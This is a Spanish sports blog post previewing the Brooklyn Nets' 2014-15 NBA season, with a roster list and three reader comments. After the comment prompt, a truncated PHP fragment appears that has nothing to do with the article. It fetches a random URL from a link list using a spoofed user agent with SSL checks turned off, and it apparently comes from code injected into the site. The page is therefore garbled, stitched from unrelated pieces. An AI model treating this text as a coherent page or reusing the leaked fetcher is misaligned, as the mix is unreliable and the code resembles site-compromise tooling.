Brooklyn Nets 2014-2015: Segundas partes nunca fueron buenas

05 de October de 2014 por TheDeerHunter

Tras tirar la casa por la ventana el curso pasado, la situación salarial que se presentaba este verano era insostenible y el margen de maniobra, casi nulo. Las salidas que se han producido pesan más en el ánimo que las llegadas, lo que deja un poso de decepción en una franquicia que apuntaba a comerse el mundo. Mantienen un núcleo duro veterano pero en el que se rompe definitivamente la mítica asociación Pierce-Garnett tras siete temporadas. El primero, por cierto, fue uno de sus mejores hombres el curso pasado y su ausencia se va a notar mucho. En cambio, una de las noticias de la postemporada ha sido la no retirada del ala-pívot. La extraña salida de Jason Kidd, curiosamente, ha provocado la única satisfacción desde nuestro punto de vista del verano: el fichaje de Lionel Hollins.

Movimientos clave

El nuevo inquilino del banquillo mantiene el excelente cartel que se ganó en su última etapa en Memphis pero ahora tendrá que lidiar con una situación mucho más compleja que aquella. La mayor parte de refuerzos son rookies que vienen a cubrir las bajas de hombres tan importantes el curso pasado como Pierce, Livingston o Blatche. Veremos cómo logran adaptarse a la nueva liga, por ejemplo, los dos europeos Bojan Bogdanovic y Sergey Karasev. De los dos segundas rondas, Cory Jefferson y Markel Brown, no se espera gran presencia a corto plazo. Adicionalmente, los Nets también han logrado hacerse con los servicios de un devaluado Jarrett Jack tras su pésimo año en Cleveland.

Qué esperamos de ellos

Si Brook Lopez pudiera llegar sano al tramo decisivo de la campaña habría que considerarlos un equipo que puede dar guerra en Playoffs e incluso pasar alguna ronda pero la competencia es mayor en la conferencia y ellos no se han reforzado demasiado. En condiciones normales les vemos más cerca de afrontar una reconstrucción que de llevarse grandes alegrías.

Pronóstico

Similar número de victorias que el año pasado (44) y clasificados para Playoffs pero caerán en primera ronda.

Plantilla

PG: Deron Williams, Jarrett Jack, Marquis Teague, Jorge Gutiérrez
SG: Joe Johnson, Alan Anderson, Markel Brown(R)
SF: Andrei Kirilenko, Bojan Bogdanovic(R), Sergey Karasev(R)
PF: Kevin Garnett, Mirza Teletovic, Cory Jefferson(R)
C: Brook Lopez, Mason Plumlee

Bajas: Andray Blatche, Jason Collins, Shaun Livingston (GSW), Paul Pierce (WAS), Marcus Thornton (BOS)

Comenta

3 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    A ver qué consigue hacer Lionel Hollins con este equipo, que aparentemente ha dado un claro paso atrás aunque en principio siguen siendo una plantilla de playoffs. Sin embargo el Este parece más competitivo este año y si vuelven a presentarse los habituales problemas físicos de Brook y Deron les dejarían fuera.

    Me gusta la llegada de Hollins y también Jack en un rol de sexto hombre que le puede ayudar a recuperarse de la desastrosa temporada en Cleveland. Pero un frontcourt AK, KG, Brook es extremadamente frágil. Plumlee es una gran rotación pero no pasa de eso.

    Como dices, primera ronda.

      Citar

  2. rumbero dice:
    #2

    Pues un año le ha durado el megaproyecto al ruso. La verdad es que a mi el equipo me dice poca cosa. En todo caso habrá que confiar en el jugo que pueda sacar Hollins a la plantilla, porque con la versión regulera de Deron, los problemas físicos de Brook y las 39 castañas de Garnett no se si van a llegar muy lejos. Luego habrá que ver si los que llegan mejoran lo que había. De entrada no parece fácil. ¿Blatche con todos sus peros y su cabeza no tiene hueco en un equipo NBA como para tener que buscarse la vida en China?

      Citar

  3. portu dice:
    #3

    Coincido nuevamente con Magic, pq aunque no me gusta sobrevalorar el trabajo de los entrenadores, creo q Hollins puede marcar la diferencia respecto al trabajo de Kidd el año pasado. Si crea un estilo de juego y un concepto de equipo pueden ser un rival duro, pero deben aportar Jack, Deron y Brook. La tendencia lógica de JJ y KG debe ser hacia abajo por lógica añosa, así q tendrá q aparecer alguien más para sumar en ataque. Y como vuelvan a lesionarse Brook o Deron, creo q definitivamente se cae el proyecto completamente.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>